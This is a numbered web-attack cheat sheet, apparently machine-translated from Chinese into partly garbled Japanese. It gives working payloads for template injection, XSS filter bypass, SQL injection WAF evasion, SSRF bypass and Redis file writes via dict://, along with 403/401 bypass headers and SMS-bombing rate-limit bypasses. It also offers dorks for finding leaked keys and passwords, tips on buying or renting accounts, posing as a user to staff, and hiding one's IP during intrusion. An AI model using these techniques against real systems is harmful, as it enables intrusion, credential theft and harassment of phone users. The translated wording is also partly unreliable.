1. {msg: params error} など、パラメーターが欠落していることを示すプロンプトが表示された場合は、辞書ファジングを使用して、さらなる攻撃に備えてパラメーターを構築してみてください。
2. プログラムがオーバーフローします。int の最大値は 2147483647 です。この値を整数オーバーフローに使用して、現象を観察してみてください。
3. 403、404 応答に落胆せず、dirsearch などのツールを使用してディレクトリを検出してみてください。
4. 検証コードの単純なバイパス: 再利用、ユニバーサル検証コード (0000、8888)、空の検証コード、検証コードが識別可能 (PKAV HTTP Fuzzer ツールなどで識別可能)
5. SMS 爆撃バイパス: 携帯電話番号の前に +86 を追加すると、携帯電話番号をメールボックスに入力し、メールボックスに携帯電話番号を入力します。
6. 認証コードが有効な場合は、一定期間繰り返し認証コードの送信を試みることができますが、有効であるため、認証コードの有効期間が延長される場合があります。
7. SQL インジェクションの際、データベースが MySQL の場合は、&& を使用して and を置き換えることができます。たとえば、「 && '1'='1,' %26%26 '1'='1」です。
8. SQL インジェクションの場合、データベースが Mysql の場合、waf filters = の代わりに like を使用してみることができます。例: および 1 のような 1
9. JWT 形式は jwt.calebb.net/ で復号化できます。前提条件は秘密鍵を知っていることです。任意のデータを構築して、秘密鍵情報を含むエラー メッセージが表示されるかどうかを確認できます。 github.com/firebase/php JWT を生成します。
JWT形式のheader.payload.signature
10. Redis サービス (ポート 1234) が開いている場合は、/actuator/redis/info ステートメントを使用して、xxx.com:1234/actuator/r などの機密情報を読み取れるかどうかを確認できます。
11. Gitlab プラットフォームの脆弱性 - CVE-2020-10977
12. API インターフェイスでは、自分でパラメータを構築したり、POST 形式でパラメータを渡したり、JSON 形式で構築してみることができます。必ず content-type: application/json、いくつかの試用可能なパラメータ、ページ、サイズ、 ID。
13. 携帯電話にテキスト メッセージの送信に制限がある場合は、携帯電話番号の前に特殊文字またはスペースを使用してみてください。
彼のロジックは次のようになります。ユーザーが携帯電話番号を入力します --> バックエンドは携帯電話番号が 30 秒以内に要求されたか 60 秒以内に要求されたかを判断します --> そうでない場合は、送信された携帯電話番号が十分純粋かどうかを判断します11桁の数字の場合
そうでない場合は、数字以外の文字を削除します --> データベース内の携帯電話番号と比較し、データベースに存在するだけで十分です。存在する場合は、確認コードを携帯電話に送信します。
14. 画像検証コードは次のように空に設定できます: code=unknown
15. 検証コードの内容を自動的に使用して、Cookie およびパラメーターにユーザーに送信される内容があるかどうかを監視し、変更を試みたり、フィッシング リンクを構築したりできます。
16. テンプレート インジェクション、 {{xxx}} に入力されたコマンド パラメーターは次のように実行できます。
www.baidu.com/{
{1+1}}
以Python为例,列出当前目录下所有文件的Payload:{
{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
17. 情報収集の場合は、総合検索でWeChatを選択し、関連企業の関連公式アカウントのアセットを検索します。
18. JS ファイル内でキーワード API、Swagger UI などを検索し、API インターフェイス アドレスを見つけてみます。
19. Swagger インターフェイスの共通パス:
/swagger/
/api/swagger/
/swagger/ui/
/api/swagger/ui/
/swagger-ui.html/
/api/swagger-ui.html/
/user/swagger-ui.html/
/swagger/ui/
/api/swagger/ui/
/libs/swaggerui/
/api/swaggerui/
/swagger-resources/configuration/ui/
/swagger-resources/configuration/security/
20. Swagger コンポーネント機能のタイトルが修正されました: Swagger UI
21. ディレクトリが存在するかどうかをブラインドでテストします。ディレクトリが存在する場合は、URL の末尾に自動的に追加/補完されます。
22. Mysql で使用できる空白文字は、%09、%0a、%0b、%0c、%0d、%20、%a0 です。
23. アカウント取得: ライブラリ、QQ グループ、github リーク、アカウントの借用/レンタル/購入。
24. Alibaba Cloud の AKSK が漏洩した場合、AKSKtools ツールを使用してさらに悪用できます。
xz.aliyun.com/t/842925。バックグラウンド ページが点滅してログインを求められる場合は、通常は権限認証方法が使用されますが、次の方法を使用してそれを回避できます。または、401 が発生した場合は、 、403、302 の場合は、次の方法を試すことができます。
一、GET /xxx HTTP/1.1 à403
Host: test.com
绕过:
GET /xxx HTTP/1.1 à200
Host: test.com
X-Original-URL: /xxx
二、GET /xxx HTTP/1.1 à403
Host: test.com
绕过:
GET /xxx HTTP/1.1 à200
Host: test.com
Referer: http://test.com/xxx
三、302跳转:拦截并drop跳转的数据包,使其停留在当前页面。
四、前端验证:只需要删掉对应的遮挡模块,或者是验证模块的前端代码。
26. gopher プロトコル ペイロードを生成するツール:
https://github.com/firebroo/sec_tools
27. 辞書プロトコルの作成プロセス:
1.写入内容;
dict://127.0.0.1:6379/set❌test
2.设置保存路径;
dict://127.0.0.1:6379/config:set:dir:/tmp/
3.设置保存文件名;
dict://127.0.0.1:6379/config:set:dbfilename:1.png
4.保存。
dict://127.0.0.1:6379/save
28. CentOS 7 システムは、suid を使用して、ルート シェルを取得する権限を昇格します。
https://www.freebuf.com/articles/system/244627.html
29. xss のタグで使用されるペイロード:
<a href=javascript:alert(1)>xx</a>
30. XSS は一重引用符をフィルター処理し、等号は次のことができます。
①、使用:String.fromCharCode(97,108,101,114,116,40,49,41);
为alert(1),该方法输出的结果为字符串,可以使用eval()进行执行,即弹框操作
eval(String.fromCharCode(97,108,101,114,116,40,49,41));
②、atob函数:
eval(atob`YWxlcnQoMSk=`) 为 eval(atob`alert(1)`) 其中`为反引号
31. XSS は一重引用符、等号、括弧、eval をフィルターします。
①、过滤了eval函数可以用其他函数去绕过,如:Function,constructor
Function`a${atob`YWxlcnQoMSk=`}```
``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```
32. 次のコマンドを使用して、Docker 仮想マシン内にいるかどうかを確認できます。
cat /proc/1/cgroup
33. ユニバーサル パスワード'=0#34 を試します。CORS 脆弱性の検証、curl を使用して次のことを検証できます。
curl https://www.xxxx.com -H "Origin: https://test.com" -I
检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com
35. ターゲットシステムがShiroであるかどうかを盲目的にテストする場合、Cookie内にrememebrMe=xxxを手動で構築できます。
返されたパッケージの Set-Cookie に rememberMe=deleteMe があれば、そのシステムが Shiro を使用していることが証明されるため、さらに攻撃される可能性があります。
36. 正規表現を使用して、Web サイトに含まれる他の URL を取得します。
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
37. いくつかの一般的なリモート コマンド実行 (RCE) パラメータについては、dicts ディレクトリの RCE-extentions.txt ファイルを参照してください。
38. SSRF 保護をバイパスするいくつかの小さな方法:
A、绕过SSRF限制通过CIDR,如:
http://127.127.127.127
http://127.0.0.0
B、不完整的地址,如:
http://127.1
http://0
C、将地址结合在通过特殊字符结合在一起,如:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib : 3.3.3.3
D、绕过解析器,如:
http://127.1.1.1:80\@127.2.2.2:80/
E、绕过localhost通过[::],如:
http://[::]:80/
http://0000::1:80/
39. 一般的に使用されるいくつかの Google 文法:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
40. ファビコンのハッシュを使用して、関連する 2 つの Web サイトを比較します。
脚本地址:https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py
命令:python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
41. いくつかのローカルパラメータが含まれています。詳細については、dicts ディレクトリ内の LFI-extentions.txt ファイルを参照してください。
42. JavaScript ファイルには、次のような隠し GET パラメータがいくつかあります。
首先,在js文件中找到一些变量,比如:var test="xss"
然后,可以尝试使用GET方法构造每一个参数,比如:
https://example.com/?test=”xsstest
本方法可能会发现一些XSS
43. github dorks を使用して、次のような機密情報を見つけます。
extension:pem private
extension:ppk private
extension:sql mysql dump password
extension:json api.forecast.io
extension:json mongolab.com
extension:yaml mongolab.com
extension:ica [WFClient] Password=
extension:avastlic “support.avast.com”
extension:js jsforce conn.login
extension:json googleusercontent client_secret
“target.com” send_keys
“target.com” password
“target.com” api_key
“target.com” apikey
“target.com” jira_password
“target.com” root_password
“target.com” access_token
“target.com” config
“target.com” client_secret
“target.com” user auth
通过上述语法,可以搜索到一些敏感的私钥,一些SSH登录私钥,mysql的数据库密码,API key等等。
另外推荐一个脚本:https://github.com/techgaun/github-dorks
44. SSRF の共通パラメータについては、dicts ディレクトリの SSRF-extensions.txt ファイルを参照してください。
45. .json サフィックスを追加すると、次のような機密情報が漏洩します。
一次正常请求:
GET /ResetPassword HTTP/1.1
{"email":"[email protected]"}
响应:
HTTP/1.1 200 OK
添加.json后缀的请求:
GET /ResetPassword.json HTTP/1.1
{"email":"[email protected]"}
响应:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
原链接:https://twitter.com/SalahHasoneh1/status/1293918353971531776
46. 応答が 401 の場合は、リクエスト ヘッダーに X-Custom-IP-Authorization: 127.0.0.1 を追加してみてください。
47. バックグラウンドでログインする Web サイトに関しては、パスワード リセット機能があり、それが無効になっている場合は、会社の技術 QQ グループを見つけて、ユーザーがパスワードを忘れたふりをして、パスワードのリセットを要求し、機能を有効にして、パスワード リセットのバグがあるかどうかを確認します。
48. 背景ページが点滅してログインを求められる場合は、通常、権限認証方法を使用します。
49、302 ジャンプ: リダイレクトされたデータ パケットをインターセプトしてドロップし、現在のページに留まります。
この操作は毎回失敗しますが、返された 302 を 200 に変更して、[場所] フィールドを削除することができます。
50. 任意のファイルをダウンロードします: /porc/self/cmdline --現在のプロセスの cmdline パラメータ、/var/lib/mlocate/mlocate.db --完全なファイル パス。
51. SMS 爆撃が発生しやすいいくつかのビジネス シナリオとバイパス方法:
①:登录处
②:注册处
③:找回密码处
④:绑定处
⑤:活动领取处
⑥:独特功能处
⑦:反馈处
一般绕过限制方法:
手机号码前后加空格,86,086,0086,+86,0,00,/r,/n, 以及特殊符号等
修改cookie,变量,返回
138888888889 12位经过短信网关取前11位,导致短信轰炸
52. 注入するときに、 --%0a Union --%0a select を試してバイパスを試みることができます。
53. 注入するときは、order by、group by、{$var} について詳しく読んでください。
54. 携帯電話番号の前に + を追加すると、SMS 爆弾が発生します。
55. サイド ステーションの応答に SMS 認証コードが表示された場合は、メイン ステーションまたは他のステーションの認証コードが共通であるかどうかを試してください。
56. SMS 認証コードを取得する際は、2 つの携帯電話番号をカンマで区切ってください。2 つの携帯電話番号が同じ認証コードを取得できる可能性があります。
57. インジェクションと ord(0x1)->true および ord(0x0)->false をテストします。
58. ファイル読み取りの脆弱性が発生した場合は、設定ファイルの読み取りに加えて、コード監査を実施するために Web サイトのファイルを読み取ることもできます。開発を怠ったためにソース コードに抜け穴がある可能性があります。
59. Python を使用して http サーバーをすばやく開きます。
基于python2.x,命令如下:
python -m SimpleHTTPServer 8000
# 在当前目录起个 8000 端口的 HTTP 服务
基于python3.x,命令如下:
python -m http.server 8000
60. 侵入するときに自分の IP アドレスを公開しないようにしてください。プロキシをハングする必要があります。
Linux で端末がプロキシを使用しているかどうかを確認したい場合は、curlifconfig.me/ で返された IP アドレスを確認できます。
Windows は ifconfig.me/ に直接アクセスできます。
61. 辞書を整理するときは、Linux で迅速にマージと重複排除を行うツールを使用することをお勧めします。
cat file1.txt file2.txt fileN.txt > out.txt
sort out.txt | uniq > out2.txt